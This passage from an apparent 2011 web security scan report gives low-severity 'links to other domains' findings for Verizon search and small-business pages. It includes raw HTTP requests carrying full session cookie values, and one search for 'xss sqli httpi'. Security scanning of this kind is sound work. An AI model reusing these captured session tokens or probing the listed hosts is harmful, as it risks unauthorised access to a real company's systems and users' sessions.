<li><a href="http://www.verizonbusiness.com/products/itsolutions/server_monitoring/">Automated Server Monitoring and Remediation Service</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/akamai/">Akamai Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/messaging/">Hosted E-mail and Instant Messaging</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/managed/">Managed Networks</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/wanoptimization/">Managed WAN Optimization Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/wan/">WAN Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/lan/">LAN Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/wirelesslan/">Managed Wireless LAN</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/ippbx/">Managed IP PBX</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/professional/">Professional Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/chain/">Custom Supply Chain Managed Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/invoice/">Invoice Automation Service</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/managed/items/">Telecom Expense Management</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/cpe/">Premises Equipment (CPE)</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/cpe/portfolio/">CPE Portfolio</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/cpe/maintenance/">CPE Maintenance</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/cpe/storage/">Storage CPE</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/cpe/siteservices/">Site Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/cpe/financing/">Ordering and Financing</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/contactcenter/">Contact Centers</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/acd/">Automatic Call Distribution</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/ip/">IP Contact Center</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/intelligent/">Intelligent Contact Routing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/speech/">Interactive Voice Response</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/workforce/">Workforce Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/quality/">Quality Monitoring</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/contactcenter/profsvcs/">Professional Services</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/conferencing/">Conferencing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/conferencing/audio/">Audio Conferencing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/conferencing/web/">Web Conferencing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/conferencing/video/">Video Conferencing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/conferencing/calculator/">Conferencing Calculator</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/voice/">Voice</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voice/local/">U.S. Local Voice Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voice/outbound/">Global Outbound Voice Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voice/inbound/">Global Inbound Voice Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voice/callingcards/">Calling Cards</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voice/911/">911 Services</a>
...[SNIP]...
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col3"><a href="http://www.verizonbusiness.com/resources/" name="&#38;lpos=topnav">Resource Center</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a1a4-111-Education.xml" name="&lpos=topnav">Education</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a1a3-111-Financial.xml" name="&lpos=topnav">Financial</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a1a5-111-Government.xml" name="&lpos=topnav">Government</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a1a2-111-Healthcare.xml" name="&lpos=topnav">Healthcare</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a1a6-111-Retail.xml" name="&lpos=topnav">Retail</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a13-111-Application+&+Performance+Management.xml" name="&lpos=topnav">Application &amp; Performance Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a1-111-Business+Continuity.xml" name="&lpos=topnav">Business Continuity</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml" name="&lpos=topnav">Conferencing</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml" name="&lpos=topnav">Connecting Business Information</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a3-111-Contact+Centers.xml" name="&lpos=topnav">Contact Centers</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml" name="&lpos=topnav">Controlling Costs</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a4-111-Data+and+IP+Services.xml" name="&lpos=topnav">Data and IP Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml" name="&lpos=topnav">Executive Leadership Series</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml" name="&lpos=topnav">Expanding Into New Markets</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml" name="&lpos=topnav">Going Green</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml" name="&lpos=topnav">Improving Productivity</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a6-111-Internet+Access.xml" name="&lpos=topnav">Internet Access</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a7-111-IT+Solutions+and+Hosting.xml" name="&lpos=topnav">IT Solutions and Hosting</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a8-111-Managed+Networks.xml" name="&lpos=topnav">Managed Networks</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml" name="&lpos=topnav">Mobility</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a2a9-111-Premises+Equipment.xml" name="&lpos=topnav">Premises Equipment</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml" name="&lpos=topnav">Professional Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a10-111-Security.xml" name="&lpos=topnav">Security</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml" name="&lpos=topnav">Securing Your Enterprise</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a11-111-Voice.xml" name="&lpos=topnav">Voice</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml" name="&lpos=topnav">Unified Communications and Collaboration</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a12-111-VoIP.xml" name="&lpos=topnav">VoIP</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml" name="&lpos=topnav">Wireless</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml" name="&lpos=topnav">Virtualization</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a25-111-Teleworking.xml" name="&lpos=topnav">Teleworking</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml" name="&lpos=topnav">Think Forward</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml" name="&lpos=topnav">Small &amp; Medium Business</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a2-111-Analyst+Reports.xml" name="&lpos=topnav">Analyst Reports</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a1-111-Awards+and+Recognition.xml" name="&lpos=topnav">Awards and Recognition</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a11-111-Blog.xml" name="&lpos=topnav">Blog</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a3a3-111-Case+Studies.xml" name="&lpos=topnav">Case Studies</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a4-111-Executive+Briefs.xml" name="&lpos=topnav">Executive Briefs</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a5-111-Fact+Sheets+&+Brochures.xml" name="&lpos=topnav">Fact Sheets &amp; Brochures</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a12-111-Newsletter.xml" name="&lpos=topnav">Newsletter</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a6-111-Podcasts.xml" name="&lpos=topnav">Podcasts</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a3a10-111-Tools.xml" name="&lpos=topnav">Tools</a></li>
<li><a href="http://www.verizonbusiness.com/resources/1002a3a7-111-Virtual+Tours+(Demos).xml" name="&lpos=topnav">Virtual Tours (Demos)</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml" name="&lpos=topnav">Webinars &amp; Videos</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a8-111-White+Papers.xml" name="&lpos=topnav">White Papers</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/resources/1002a3a13-111-Thought+Leadership.xml" name="&lpos=topnav">Thought Leadership</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/info/thinkforward/">Think Forward</a>
...[SNIP]...
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col4"><a href="http://www.verizonbusiness.com/about/" name="&#38;lpos=topnav">About Us</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/company/">Our Company</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/company/executives/">Executive Team</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/company/history/">History</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/network/">Global Network</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/ipinnovation/">IP Innovation</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/products/">Product Scope</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/environment/">Green Initiatives</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/news/">News Center</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/globalarchive/">Global Archive</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/presskits/">Press Kits</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/media/">Media Contacts</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/fast/">Quick Profile</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/network/">Network Facts</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/about/news/podcasts/">Podcasts</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/about/events/">Global Events</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.jobs/">Career Center</a>
...[SNIP]...
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col5"><a href="http://www.verizonbusiness.com/support/" name="&#38;lpos=topnav">Support</a></td>
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col6"><a href="http://www.verizonbusiness.com/support/myaccount/" name="&#38;lpos=topnav">Manage My Account</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="https://customercenter.verizonbusiness.com">Enterprise Center Sign In</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/support/myaccount/tools/">Customer Enablement Tools</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/support/myaccount/tools/center/">Online service management tools</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/support/myaccount/tools/ebonding/">System integration to service management tools</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/support/myaccount/tools/edibilling/">Electronic billing detail publishing</a>
...[SNIP]...
<h3><a href="http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml" name="&lid=Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution&lpos=natural_1">Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution</a>
...[SNIP]...
<h3><a href="http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud-Based+Managed+Data+Protection+Solution.xml" name="&lid=Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution&lpos=natural_2">Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution</a>
...[SNIP]...
<h3><a href="http://www.verizonbusiness.com/us/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml" name="&lid=Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution&lpos=natural_3">Verizon Business News: Verizon and IBM Launch Private Cloud-Based Managed Data Protection Solution</a>
...[SNIP]...
<!--test-->
<script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/wz_tooltip.js"></script>
<script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/tip_balloon.js"></script>
...[SNIP]...
<li class="top"><a href="http://www.verizonbusiness.com/us/">United States</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/ar/">Argentina</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/au/">Australia</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/at/">Austria</a></li>
<li><a href="http://www.verizonbusiness.com/be/">Belgium</a></li>
<li><a href="http://www.verizonbusiness.com/br/">Brazil</a></li>
<li><a href="http://www.verizonbusiness.com/ca/">Canada</a></li>
<li><a href="http://www.verizonbusiness.com/cl/">Chile</a></li>
<li><a href="http://www.verizonbusiness.com/cn/">China</a></li>
<li><a href="http://www.verizonbusiness.com/co/">Colombia</a></li>
<li><a href="http://www.verizonbusiness.com/dk/">Denmark</a></li>
<li><a href="http://www.verizonbusiness.com/fi/">Finland</a></li>
<li><a href="http://www.verizonbusiness.com/fr/">France</a></li>
<li><a href="http://www.verizonbusiness.com/de/">Germany</a></li>
<li><a href="http://www.verizonbusiness.com/hk/">Hong Kong</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/in/">India</a></li>
<li><a href="http://www.verizonbusiness.com/ie/">Ireland</a></li>
<li><a href="http://www.verizonbusiness.com/it/">Italy</a></li>
<li><a href="http://www.verizonbusiness.com/jp/">Japan</a></li>
<li><a href="http://www.verizonbusiness.com/kr/">Korea</a></li>
<li><a href="http://www.verizonbusiness.com/mx/">Mexico</a></li>
<li><a href="http://www.verizonbusiness.com/nl/">Netherlands</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/nz/">New Zealand</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/no/">Norway</a></li>
<li><a href="http://www.verizonbusiness.com/pa/">Panama</a></li>
<li><a href="http://www.verizonbusiness.com/pt/">Portugal</a></li>
<li><a href="http://www.verizonbusiness.com/sg/">Singapore</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/es/">Spain</a></li>
<li><a href="http://www.verizonbusiness.com/se/">Sweden</a></li>
<li><a href="http://www.verizonbusiness.com/ch/">Switzerland</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/tw/">Taiwan</a></li>
<li><a href="http://www.verizonbusiness.com/uk/">United Kingdom</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/us/">United States </a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/ve/">Venezuela</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/countries/">All Countries...</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/">Worldwide Site</a>
...[SNIP]...
<li><a name="&#38;lpos=footer" href="http://www.verizonbusiness.com/terms/">Legal Notices</a>
...[SNIP]...
<li><a name="&#38;lpos=footer" href="http://www.verizonbusiness.com/sitemap/">Site Map</a>
...[SNIP]...
</script><script language="javascript1.1" src="http://www.verizonbusiness.com/templates/hbx.js"></script>
...[SNIP]...

15.28. http://search.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.verizon.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /?rv=r&tp=r&q=xss%20sqli%20httpi HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; WT_FPC=id=28b61e607d5af813da51315275720760:lv=1315275720760:ss=1315275720760; CP=null*; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:39:09 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 135547


       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Verizon | Site Search for xss sqli httpi</title>
   <meta http-equiv="content-type" content="text/html; c
...[SNIP]...
</script>

   <link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css" />
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/gn_engine.js"></script>
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/search.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb000035a2/publish/includes/css/default.css" />

<script type="text/javaScript">
...[SNIP]...
<noscript><img alt="" style="border-width:0;" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsi8dupuerp17vzhd59b2lwc_8u5u/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0" /></noscript>
...[SNIP]...
<li><a class="scbtnav" title="Verizon Wireless" href="http://www.verizonwireless.com/" name="&amp;lid=hp_wireless_tab">Wireless</a>
...[SNIP]...
<p><a href="http://www.verizonwireless.com/b2c/" name="&lid=overlay_phone_wireless"><img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" alt="" border="0" class="scbppimg scbppvzw" />
...[SNIP]...
</span>
               <a href="http://www.thinkfinity.org/" target="_blank">Verizon Thinkfinity</a>
...[SNIP]...
<!-- mp_trans_remove_start -->
           <a href="http://www.truste.org/ivalidate.php?url=www.verizon.com&amp;sealid=101" target="_blank" name="&lid=TRUSTeFooter">
               <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="TRUSTe Certified Privacy" title="TRUSTe Certified Privacy" class="ghfpics gftruste" />
...[SNIP]...
<!-- mp_trans_remove_end -->
           <a href="http://www.bbbonline.org/cks.asp?id=108072593112" target="_blank" name="&lid=BBBFooter">
               <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="Better Business Bureau: Accredited Business" title="Better Business Bureau: Accredited Business" class=
...[SNIP]...
</span><a href="http://www.thinkfinity.org/" target="_blank">Verizon Thinkfinity</a>
...[SNIP]...
<!-- mp_trans_remove_start -->
   <a href="http://www.truste.org/ivalidate.php?url=www.verizon.com&amp;sealid=101" target="_blank" name="&lid=TRUSTeFooter">
   <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="TRUSTe Certified Privacy" title="TRUSTe Certified Privacy" class="ghfpics gftruste" />
...[SNIP]...
<!-- mp_trans_remove_end -->
   <a href="http://www.bbbonline.org/cks.asp?id=108072593112" target="_blank" name="&lid=BBBFooter">
       <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="Better Business Bureau: Accredited Business" title="Better Business Bureau: Accredited Business" class="g
...[SNIP]...

15.29. http://search.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.verizon.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /?market=94531+zz&q=oss+sq&rv=b&st=zz&tp=c&u1=q HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=c&rv=b&q=xss%20sq
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; vsrecentsearches=wss~xss~xss%20sq~~; CP=null*; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:21:57 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 132824


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Verizon | Site Search for oss sq</title>
   <meta http-equiv="content-type" content="text/html; charset=iso-
...[SNIP]...
</script>

   <link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css" />
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/gn_engine.js"></script>
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/search.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb000035a2/publish/includes/css/default.css" />

<script type="text/javaScript">
...[SNIP]...
<noscript><img alt="" style="border-width:0;" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsi8dupuerp17vzhd59b2lwc_8u5u/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.0.0" /></noscript>
...[SNIP]...
<li><a class="scbtnav" title="Verizon Wireless" href="http://www.verizonwireless.com/" name="&amp;lid=hp_wireless_tab">Wireless</a>
...[SNIP]...
<!--test-->
<script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/wz_tooltip.js"></script>
<script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/tip_balloon.js"></script>
...[SNIP]...
</span>
               <a href="http://www.thinkfinity.org/" target="_blank">Verizon Thinkfinity</a>
...[SNIP]...
<!-- mp_trans_remove_start -->
           <a href="http://www.truste.org/ivalidate.php?url=www.verizon.com&amp;sealid=101" target="_blank" name="&lid=TRUSTeFooter">
               <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="TRUSTe Certified Privacy" title="TRUSTe Certified Privacy" class="ghfpics gftruste" />
...[SNIP]...
<!-- mp_trans_remove_end -->
           <a href="http://www.bbbonline.org/cks.asp?id=108072593112" target="_blank" name="&lid=BBBFooter">
               <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="Better Business Bureau: Accredited Business" title="Better Business Bureau: Accredited Business" class=
...[SNIP]...
</span><a href="http://www.thinkfinity.org/" target="_blank">Verizon Thinkfinity</a>
...[SNIP]...
<!-- mp_trans_remove_start -->
   <a href="http://www.truste.org/ivalidate.php?url=www.verizon.com&amp;sealid=101" target="_blank" name="&lid=TRUSTeFooter">
   <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="TRUSTe Certified Privacy" title="TRUSTe Certified Privacy" class="ghfpics gftruste" />
...[SNIP]...
<!-- mp_trans_remove_end -->
   <a href="http://www.bbbonline.org/cks.asp?id=108072593112" target="_blank" name="&lid=BBBFooter">
       <img src="https://www22.verizon.com/images/spacer.gif" width="1" height="1" border="0" alt="Better Business Bureau: Accredited Business" title="Better Business Bureau: Accredited Business" class="g
...[SNIP]...

15.30. http://smallbusiness.verizon.com/scripts/combined.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smallbusiness.verizon.com
Path:   /scripts/combined.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /scripts/combined.aspx?type=peheader&add= HTTP/1.1
Host: smallbusiness.verizon.com
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
